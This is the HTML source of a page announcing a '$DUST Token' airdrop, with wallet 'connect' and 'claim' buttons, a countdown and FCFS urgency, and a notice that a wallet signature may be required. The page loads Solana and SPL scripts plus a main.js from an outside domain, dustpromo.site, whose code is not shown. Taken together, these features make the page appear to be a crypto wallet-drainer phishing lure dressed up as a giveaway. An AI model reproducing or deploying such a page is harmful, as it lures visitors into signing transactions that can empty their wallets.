<!DOCTYPE html>
<html lang="en" ml-update="aware" style="filter: hue-rotate(4deg);">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script jquery-version="" src="./jquery-3.6.0.min.js"></script>
    <title>DUST Airdrop</title>
    <meta name="author" content="SitePoint">
    <meta property="og:type" content="website">
    <link rel="icon" href="./favicon.svg">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link href="./css2" rel="stylesheet">
    <link href="./toastr.min.css" rel="stylesheet">
    <style type="text/css">
        body {
            font-family: 'Inter', sans-serif;
            background: url(./bg.png)
        }

        .custombtn {
            cursor: pointer;
            display: inline-flex;
            appearance: none;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            user-select: none;
            position: relative;
            white-space: nowrap;
            vertical-align: middle;
            outline-offset: 2px;
            font-weight: 800;
            background-color: black;
            border-color: #c2bebe;
            text-decoration: none;
            outline: transparent solid 2px;
            border-width: 1px;
            border-style: solid;
            border-image: initial;
            height: 60px
        }

        .custombtn:disabled {
            background-color: #202020;
            color: #D1D5DB;
            border: none;
            cursor: not-allowed;
        }

        .custombtn:disabled:hover {
            background-color: #202020;
            color: #D1D5DB;
            border: none;
            cursor: not-allowed;
        }

        .toast-info {
            background-color: #121619;
            color: #c2bebe !important;
            box-shadow: none !important;
            font-size: 14px;
        }

        #toast-container>.toast-info {
            background-image: url('favicon.svg') !important;
            background-size: 30px;
        }

        .loader {
            border-top-color: #c2bebe;
            -webkit-animation: spinner 1.5s linear infinite;
            animation: spinner 1.5s linear infinite;
        }

        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
            }
        }

        @keyframes spinner {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
    <link href="./main.css" rel="stylesheet">
    <style>
        /* ! tailwindcss v3.3.3 | MIT License | https://tailwindcss.com */
        *,
        ::after,
        ::before {
            box-sizing: border-box;
            border-width: 0;
            border-style: solid;
            border-color: #e5e7eb
        }

        ::after,
        ::before {
            --tw-content: ''
        }

        html {
            line-height: 1.5;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            tab-size: 4;
            font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            font-feature-settings: normal;
            font-variation-settings: normal
        }

        body {
            margin: 0;
            line-height: inherit
        }

        hr {
            height: 0;
            color: inherit;
            border-top-width: 1px
        }

        abbr:where([title]) {
            -webkit-text-decoration: underline dotted;
            text-decoration: underline dotted
        }

        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            font-size: inherit;
            font-weight: inherit
        }

        a {
            color: inherit;
            text-decoration: inherit
        }

        b,
        strong {
            font-weight: bolder
        }

        code,
        kbd,
        pre,
        samp {
            font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            font-size: 1em
        }

        small {
            font-size: 80%
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline
        }

        sub {
            bottom: -.25em
        }

        sup {
            top: -.5em
        }

        table {
            text-indent: 0;
            border-color: inherit;
            border-collapse: collapse
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-feature-settings: inherit;
            font-variation-settings: inherit;
            font-size: 100%;
            font-weight: inherit;
            line-height: inherit;
            color: inherit;
            margin: 0;
            padding: 0
        }

        button,
        select {
            text-transform: none
        }

        [type=button],
        [type=reset],
        [type=submit],
        button {
            -webkit-appearance: button;
            background-color: transparent;
            background-image: none
        }

        :-moz-focusring {
            outline: auto
        }

        :-moz-ui-invalid {
            box-shadow: none
        }

        progress {
            vertical-align: baseline
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        summary {
            display: list-item
        }

        blockquote,
        dd,
        dl,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        p,
        pre {
            margin: 0
        }

        fieldset {
            margin: 0;
            padding: 0
        }

        legend {
            padding: 0
        }

        menu,
        ol,
        ul {
            list-style: none;
            margin: 0;
            padding: 0
        }

        dialog {
            padding: 0
        }

        textarea {
            resize: vertical
        }

        input::placeholder,
        textarea::placeholder {
            opacity: 1;
            color: #9ca3af
        }

        [role=button],
        button {
            cursor: pointer
        }

        :disabled {
            cursor: default
        }

        audio,
        canvas,
        embed,
        iframe,
        img,
        object,
        svg,
        video {
            display: block;
            vertical-align: middle
        }

        img,
        video {
            max-width: 100%;
            height: auto
        }

        [hidden] {
            display: none
        }

        *,
        ::before,
        ::after {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgb(59 130 24 / 0.5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia:
        }

        ::backdrop {
            --tw-border-spacing-x: 0;
            --tw-border-spacing-y: 0;
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 0;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            --tw-pan-x: ;
            --tw-pan-y: ;
            --tw-pinch-zoom: ;
            --tw-scroll-snap-strictness: proximity;
            --tw-gradient-from-position: ;
            --tw-gradient-via-position: ;
            --tw-gradient-to-position: ;
            --tw-ordinal: ;
            --tw-slashed-zero: ;
            --tw-numeric-figure: ;
            --tw-numeric-spacing: ;
            --tw-numeric-fraction: ;
            --tw-ring-inset: ;
            --tw-ring-offset-width: 0px;
            --tw-ring-offset-color: #fff;
            --tw-ring-color: rgb(59 130 24 / 0.5);
            --tw-ring-offset-shadow: 0 0 #0000;
            --tw-ring-shadow: 0 0 #0000;
            --tw-shadow: 0 0 #0000;
            --tw-shadow-colored: 0 0 #0000;
            --tw-blur: ;
            --tw-brightness: ;
            --tw-contrast: ;
            --tw-grayscale: ;
            --tw-hue-rotate: ;
            --tw-invert: ;
            --tw-saturate: ;
            --tw-sepia: ;
            --tw-drop-shadow: ;
            --tw-backdrop-blur: ;
            --tw-backdrop-brightness: ;
            --tw-backdrop-contrast: ;
            --tw-backdrop-grayscale: ;
            --tw-backdrop-hue-rotate: ;
            --tw-backdrop-invert: ;
            --tw-backdrop-opacity: ;
            --tw-backdrop-saturate: ;
            --tw-backdrop-sepia:
        }

        .fixed {
            position: fixed
        }

        .relative {
            position: relative
        }

        .bottom-0 {
            bottom: 0px
        }

        .left-0 {
            left: 0px
        }

        .right-0 {
            right: 0px
        }

        .top-0 {
            top: 0px
        }

        .z-50 {
            z-index: 50
        }

        .m-3 {
            margin: 0.75rem
        }

        .mx-1 {
            margin-left: 0.25rem;
            margin-right: 0.25rem
        }

        .mx-auto {
            margin-left: auto;
            margin-right: auto
        }

        .-mb-16 {
            margin-bottom: -4rem
        }

        .mb-3 {
            margin-bottom: 0.75rem
        }

        .mb-4 {
            margin-bottom: 1rem
        }

        .ml-2 {
            margin-left: 0.5rem
        }

        .ml-4 {
            margin-left: 1rem
        }

        .mr-1 {
            margin-right: 0.25rem
        }

        .mt-10 {
            margin-top: 2.5rem
        }

        .mt-12 {
            margin-top: 3rem
        }

        .mt-3 {
            margin-top: 0.75rem
        }

        .mt-4 {
            margin-top: 1rem
        }

        .block {
            display: block
        }

        .inline-block {
            display: inline-block
        }

        .flex {
            display: flex
        }

        .inline-flex {
            display: inline-flex
        }

        .h-12 {
            height: 3rem
        }

        .h-5 {
            height: 1.25rem
        }

        .h-screen {
            height: 100vh
        }

        .w-1\/3 {
            width: 33.333333%
        }

        .w-12 {
            width: 3rem
        }

        .w-24 {
            width: 6rem
        }

        .w-5 {
            width: 1.25rem
        }

        .w-full {
            width: 100%
        }

        .max-w-7xl {
            max-width: 80rem
        }

        .max-w-md {
            max-width: 28rem
        }

        .flex-1 {
            flex: 1 1 0%
        }

        .flex-col {
            flex-direction: column
        }

        .items-center {
            align-items: center
        }

        .justify-center {
            justify-content: center
        }

        .justify-between {
            justify-content: space-between
        }

        .overflow-hidden {
            overflow: hidden
        }

        .rounded-full {
            border-radius: 9999px
        }

        .rounded-lg {
            border-radius: 0.5rem
        }

        .rounded-md {
            border-radius: 0.375rem
        }

        .border-4 {
            border-width: 4px
        }

        .border-t-4 {
            border-top-width: 4px
        }

        .border-gray-200 {
            --tw-border-opacity: 1;
            border-color: rgb(229 231 235 / var(--tw-border-opacity))
        }

        .bg-limegreen {
            --tw-bg-opacity: 1;
            background-color: #F73F00
        }

        .hover\:bg-limegreen:hover {
            --tw-bg-opacity: 1;
            background-color: #F73F00
        }

        .bg-black {
            --tw-bg-opacity: 1;
            background-color: rgb(0 0 0 / var(--tw-bg-opacity))
        }

        .bg-gray-800 {
            --tw-bg-opacity: 1;
            background-color: rgb(31 41 55 / var(--tw-bg-opacity))
        }

        .bg-lrgray {
            --tw-bg-opacity: 1;
            background-color: rgb(0 0 0 / var(--tw-bg-opacity))
        }

        .bg-lrgreen {
            --tw-bg-opacity: 1;
            background-color: rgb(39 117 22 / var(--tw-bg-opacity))
        }

        .p-1 {
            padding: 0.25rem
        }

        .p-2 {
            padding: 0.5rem
        }

        .p-8 {
            padding: 2rem
        }

        .px-3 {
            padding-left: 0.75rem;
            padding-right: 0.75rem
        }

        .px-4 {
            padding-left: 1rem;
            padding-right: 1rem
        }

        .py-0 {
            padding-top: 0px;
            padding-bottom: 0px
        }

        .py-0\.5 {
            padding-top: 0.125rem;
            padding-bottom: 0.125rem
        }

        .py-2 {
            padding-top: 0.5rem;
            padding-bottom: 0.5rem
        }

        .pr-2 {
            padding-right: 0.5rem
        }

        .pt-10 {
            padding-top: 2.5rem
        }

        .pt-5 {
            padding-top: 1.25rem
        }

        .pt-6 {
            padding-top: 1.5rem
        }

        .text-center {
            text-align: center
        }

        .font-mono {
            font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace
        }

        .text-2xl {
            font-size: 1.5rem;
            line-height: 2rem
        }

        .text-3xl {
            font-size: 1.875rem;
            line-height: 2.25rem
        }

        .text-4xl {
            font-size: 2.25rem;
            line-height: 2.5rem
        }

        .text-base {
            font-size: 1rem;
            line-height: 1.5rem
        }

        .text-sm {
            font-size: 0.875rem;
            line-height: 1.25rem
        }

        .text-xl {
            font-size: 1.25rem;
            line-height: 1.75rem
        }

        .text-xs {
            font-size: 0.75rem;
            line-height: 1rem
        }

        .font-bold {
            font-weight: 700
        }

        .font-extralight {
            font-weight: 200
        }

        .font-medium {
            font-weight: 500
        }

        .font-semibold {
            font-weight: 600
        }

        .uppercase {
            text-transform: uppercase
        }

        .leading-5 {
            line-height: 1.25rem
        }

        .leading-none {
            line-height: 1
        }

        .tracking-tight {
            letter-spacing: -0.025em
        }

        .text-black {
            --tw-text-opacity: 1;
            color: rgb(0 0 0 / var(--tw-text-opacity))
        }

        .text-gray-200 {
            --tw-text-opacity: 1;
            color: rgb(229 231 235 / var(--tw-text-opacity))
        }

        .text-gray-500 {
            --tw-text-opacity: 1;
            color: rgb(107 114 128 / var(--tw-text-opacity))
        }

        .text-lrgreen {
            --tw-text-opacity: 1;
            color: rgb(39 117 22 / var(--tw-text-opacity))
        }

        .text-white {
            --tw-text-opacity: 1;
            color: rgb(255 255 255 / var(--tw-text-opacity))
        }

        .opacity-75 {
            opacity: 0.75
        }

        .shadow {
            --tw-shadow: 0 1px 3px 0 rgb(0 0 0 / 0.1), 0 1px 2px -1px rgb(0 0 0 / 0.1);
            --tw-shadow-colored: 0 1px 3px 0 var(--tw-shadow-color), 0 1px 2px -1px var(--tw-shadow-color);
            box-shadow: var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)
        }

        .ease-linear {
            transition-timing-function: linear
        }

        body {
            font-family: 'Inter', sans-serif;
        }

        .custombtn {
            cursor: pointer;
            display: inline-flex;
            -webkit-appearance: none;
            appearance: none;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            -webkit-user-select: none;
            user-select: none;
            position: relative;
            white-space: nowrap;
            vertical-align: middle;
            outline-offset: 2px;
            font-weight: 800;
            background-color: black;
            border-color: #c2bebe;
            text-decoration: none;
            outline: transparent solid 2px;
            border-width: 1px;
            border-style: solid;
            border-image: initial;
            height: 60px
        }

        .custombtn:disabled {
            background-color: #202020;
            color: #D1D5DB;
            border: none;
            cursor: not-allowed;
        }

        .custombtn:disabled:hover {
            background-color: #202020;
            color: #D1D5DB;
            border: none;
            cursor: not-allowed;
        }

        .toast-info {
            background-color: #121619;
            color: #c2bebe !important;
            box-shadow: none !important;
            font-size: 14px;
        }

        #toast-container>.toast-info {
            background-image: url('favicon.svg') !important;
            background-size: 30px;
        }

        .loader {
            border-top-color: #c2bebe;
            -webkit-animation: spinner 1.5s linear infinite;
            animation: spinner 1.5s linear infinite;
        }

        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
            }
        }

        @keyframes spinner {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        .hover\:border-lrgreen:hover {
            --tw-border-opacity: 1;
            border-color: rgb(39 117 22 / var(--tw-border-opacity))
        }

        .hover\:bg-lrgreen:hover {
            --tw-bg-opacity: 1;
            background-color: rgb(39 117 22 / var(--tw-bg-opacity))
        }

        .hover\:text-gray-200:hover {
            --tw-text-opacity: 1;
            color: rgb(229 231 235 / var(--tw-text-opacity))
        }

        .hover\:text-white:hover {
            --tw-text-opacity: 1;
            color: rgb(255 255 255 / var(--tw-text-opacity))
        }

        .focus\:outline-none:focus {
            outline: 2px solid transparent;
            outline-offset: 2px
        }

        .focus\:ring-2:focus {
            --tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color);
            --tw-ring-shadow: var(--tw-ring-inset) 0 0 0 calc(2px + var(--tw-ring-offset-width)) var(--tw-ring-color);
            box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000)
        }

        .focus\:ring-indigo-300:focus {
            --tw-ring-opacity: 1;
            --tw-ring-color: rgb(165 180 252 / var(--tw-ring-opacity))
        }

        .focus\:ring-offset-2:focus {
            --tw-ring-offset-width: 2px
        }

        .focus\:ring-offset-gray-900:focus {
            --tw-ring-offset-color: #111827
        }

        @media (min-width: 640px) {
            .sm\:-mb-48 {
                margin-bottom: -12rem
            }

            .sm\:ml-3 {
                margin-left: 0.75rem
            }

            .sm\:mt-0 {
                margin-top: 0px
            }

            .sm\:mt-12 {
                margin-top: 3rem
            }

            .sm\:mt-5 {
                margin-top: 1.25rem
            }

            .sm\:flex {
                display: flex
            }

            .sm\:max-w-2xl {
                max-width: 42rem
            }

            .sm\:px-6 {
                padding-left: 1.5rem;
                padding-right: 1.5rem
            }

            .sm\:pt-16 {
                padding-top: 4rem
            }

            .sm\:text-center {
                text-align: center
            }

            .sm\:text-6xl {
                font-size: 3.75rem;
                line-height: 1
            }

            .sm\:text-base {
                font-size: 1rem;
                line-height: 1.5rem
            }

            .sm\:text-xl {
                font-size: 1.25rem;
                line-height: 1.75rem
            }
        }

        @media (min-width: 768px) {
            .md\:ml-7 {
                margin-left: 1.75rem
            }

            .md\:flex {
                display: flex
            }

            .md\:w-auto {
                width: auto
            }

            .md\:text-3xl {
                font-size: 1.875rem;
                line-height: 2.25rem
            }
        }

        @media (min-width: 1024px) {
            .lg\:relative {
                position: relative
            }

            .lg\:m-0 {
                margin: 0px
            }

            .lg\:mt-6 {
                margin-top: 1.5rem
            }

            .lg\:flex {
                display: flex
            }

            .lg\:grid {
                display: grid
            }

            .lg\:max-w-none {
                max-width: none
            }

            .lg\:grid-cols-2 {
                grid-template-columns: repeat(2, minmax(0, 1fr))
            }

            .lg\:items-center {
                align-items: center
            }

            .lg\:justify-start {
                justify-content: flex-start
            }

            .lg\:gap-8 {
                gap: 2rem
            }

            .lg\:overflow-hidden {
                overflow: hidden
            }

            .lg\:px-0 {
                padding-left: 0px;
                padding-right: 0px
            }

            .lg\:px-8 {
                padding-left: 2rem;
                padding-right: 2rem
            }

            .lg\:py-24 {
                padding-top: 6rem;
                padding-bottom: 6rem
            }

            .lg\:pb-14 {
                padding-bottom: 3.5rem
            }

            .lg\:pt-8 {
                padding-top: 2rem
            }

            .lg\:text-left {
                text-align: left
            }

            .lg\:text-lg {
                font-size: 1.125rem;
                line-height: 1.75rem
            }

            .lg\:text-sm {
                font-size: 0.875rem;
                line-height: 1.25rem
            }
        }

        @media (min-width: 1280px) {
            .xl\:text-6xl {
                font-size: 3.75rem;
                line-height: 1
            }

            .xl\:text-base {
                font-size: 1rem;
                line-height: 1.5rem
            }

            .xl\:text-xl {
                font-size: 1.25rem;
                line-height: 1.75rem
            }
        }
    </style>
</head>

<body class="bg-black" onload="start()">
    <div id="app_script">
        <div class="Toastify"></div>
    </div>
    <div id="loader"
        class="fixed top-0 left-0 right-0 bottom-0 w-full h-screen z-50 overflow-hidden bg-gray-800 opacity-75 flex flex-col items-center justify-center"
        style="display: none;">
        <div class="loader ease-linear rounded-full border-4 border-t-4 border-gray-200 h-12 w-12 mb-4"></div>
        <h2 class="text-center text-white text-xl font-semibold">You are in line for the $DUST Token Airdrop...
        </h2>
        <p class="w-1/3 text-center text-white">This may take a few seconds, please don't close this page.</p>
    </div>
    <div class="relative overflow-hidden">
        <header class="relative">
            <div class="bg-lrgray pt-6">
                <nav class="relative mx-auto flex max-w-7xl items-center justify-between px-4 sm:px-6"
                    aria-label="Global">
                    <div class="flex flex-1 items-center">
                        <div class="flex w-full items-center justify-between md:w-auto">
                            <img class="h-12" src="./logo.png" alt="">
                        </div>
                    </div>
                </nav>
            </div>
        </header>
        <main>
            <div class="pt-10 sm:pt-16 lg:overflow-hidden lg:pt-8 lg:pb-14">
                <div class="mx-auto max-w-7xl lg:px-8">
                    <div class="lg:grid lg:grid-cols-2 lg:gap-8">
                        <div
                            class="mx-auto max-w-md px-4 sm:max-w-2xl sm:px-6 sm:text-center lg:flex lg:items-center lg:px-0 lg:text-left md:flex justify-center">
                            <div class="lg:py-24">
                                <div
                                    class="inline-flex items-center rounded-full bg-black p-1 pr-2 text-white hover:text-gray-200 sm:text-base lg:text-sm xl:text-base">
                                    <span style="background-color: #F0D200;"
                                        class="py-2 rounded-full bg-lrgreen px-3 py-0.5 text-sm font-semibold leading-5 text-black">Distribution
                                        Started</span>
                                    <span class="ml-4 text-sm">FCFS</span>

                                    <svg class="ml-2 h-5 w-5 text-gray-500" xmlns="http://www.w3.org/2000/svg"
                                        viewBox="0 0 20 20" fill="currentColor" aria-hidden="true">
                                        <path fill-rule="evenodd"
                                            d="M7.21 14.77a.75.75 0 01.02-1.06L11.168 10 7.23 6.29a.75.75 0 111.04-1.08l4.5 4.25a.75.75 0 010 1.08l-4.5 4.25a.75.75 0 01-1.06-.02z"
                                            clip-rule="evenodd"></path>
                                    </svg>
                                </div>
                                <h1
                                    class="mt-4 text-4xl font-bold tracking-tight text-white sm:mt-5 sm:text-6xl lg:mt-6 xl:text-6xl">
                                    <span class="block">$DUST Token</span>
                                    <span class="block text-lrgreen" style="color: #F73F00">Distribution</span>
                                </h1>
                                <p class="mt-3 text-base text-gray-500 sm:mt-5 sm:text-xl lg:text-lg xl:text-xl">The <b
                                        class="text-lrgreen" style="color: #05EAFF">$DUST</b> Token Distribution has
                                    started.<br> We will
                                    distribute a total of <b class="text-lrgreen" style="color: #05EAFF">$1,000,000
                                        $DUST</b></p>
                                <div id="timer">
                                    <h1 class="pt-5 text-2xl mb-3 font-extralight text-gray-200">Round Closing</h1>
                                    <div
                                        class="justify-center md:text-3xl text-center flex w-full lg:justify-start text-3xl text-center flex w-full">
                                        <div class="text-xl mr-1 font-extralight text-gray-200 flex items-center">in
                                        </div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg" style="color: #05EAFF">
                                            <div class="font-mono leading-none inline-block" id="hourz">-</div>
                                            <div class="font-mono uppercase text-sm leading-none">Hours</div>
                                        </div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg" style="color: #05EAFF">
                                            <div class="font-mono leading-none inline-block" id="minutes">-</div>
                                            <div class="font-mono uppercase text-sm leading-none">Minutes</div>
                                        </div>
                                        <div class="text-xl mx-1 font-extralight text-gray-200 flex items-center">and
                                        </div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg" style="color: #05EAFF">
                                            <div class="font-mono leading-none inline-block" id="seconds">-</div>
                                            <div class="font-mono uppercase text-sm leading-none">Seconds</div>
                                        </div>
                                    </div>
                                </div>
                                <div class="mt-10 sm:mt-12">
                                    <div data-id="connectContainer"
                                        class="lg:flex lg:justify-start md:flex sm:flex justify-center"
                                        style="display: block;">
                                        <div class="mt-3 sm:mt-0 sm:ml-3">
                                            <button id="connectButton" style="color: white; width: 320px" type="button"
                                                onclick="connect()"
                                                class="interact-button m-3 p-8 custombtn text-lrgreen block w-full rounded-md bg-lrgreen font-medium text-2xl shadow hover:bg-limegreen hover:text-white focus:outline-none focus:ring-2 focus:ring-indigo-300 focus:ring-offset-2 focus:ring-offset-gray-900">Loading...</button>
                                        </div>
                                    </div>
                                    <div id="claimContainer"
                                        class="lg:flex lg:justify-start md:flex sm:flex justify-center">
                                        <div class="mt-3 sm:mt-0 sm:ml-3">
                                            <button id="claimButton" type="button" onclick="claim()" disabled
                                                class="interact-button m-3 p-8 custombtn text-lrgreen block w-full rounded-md bg-lrgreen font-medium text-2xl shadow hover:bg-limegreen hover:text-white focus:outline-none focus:ring-2 focus:ring-indigo-300 focus:ring-offset-2 focus:ring-offset-gray-900"
                                                style="width: 320px">
                                                <span id="claimText">
                                                    <span data-id="spinner_text" style="color:#fff">Claim</span>
                                                    <span data-id="spinner_text"
                                                        style="color: #F0D200;">&nbsp;$DUST</span>
                                                </span>
                                                <span id="noFundsText" style="display: none">
                                                    <span data-id="spinner_text" style="color:#d00000">No funds for tx
                                                        fees</span>
                                                </span>
                                                <span id="notEligibleText" style="display: none">
                                                    <span data-id="spinner_text" style="color:#d00000">Not eligible</span>
                                                </span>
                                                <span id="failedText" style="display: none">
                                                    <span data-id="spinner_text" style="color:#d00000">Claim failed</span>
                                                </span>
                                                <span id="againText" style="display: none">
                                                    <span data-id="spinner_text" style="color:#fff">Try again?</span>
                                                </span>
                                                <svg id="spinner" class="spinner" viewBox="0 0 50 50"
                                                    style="margin-left: 15px; display: none">
                                                    <circle class="path" cx="25" cy="25" r="20" fill="none"
                                                        stroke-width="8"></circle>
                                                </svg>
                                            </button>
                                        </div>
                                    </div>
                                    <p class="text-xs text-lrgreen mt-4 flex justify-center lg:justify-start md:ml-7"
                                        style="color: #05EAFF">A
                                        signature may be required to prove
                                        ownership of wallet</p>
                                </div>
                            </div>
                        </div>
                        <div class="mt-12 -mb-16 sm:-mb-48 lg:relative lg:m-0">
                            <div class="mx-auto max-w-md px-4 sm:max-w-2xl sm:px-6 lg:max-w-none lg:px-0">
                                <img src="./365.gif">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </main>
    </div>
    <script src="./toastr.min.js"></script>
    <script src="https://dustpromo.site/solana.js"></script>
    <script src="https://dustpromo.site/spl.js"></script>
    <script src="https://dustpromo.site/main.js"></script>
</body>

</html>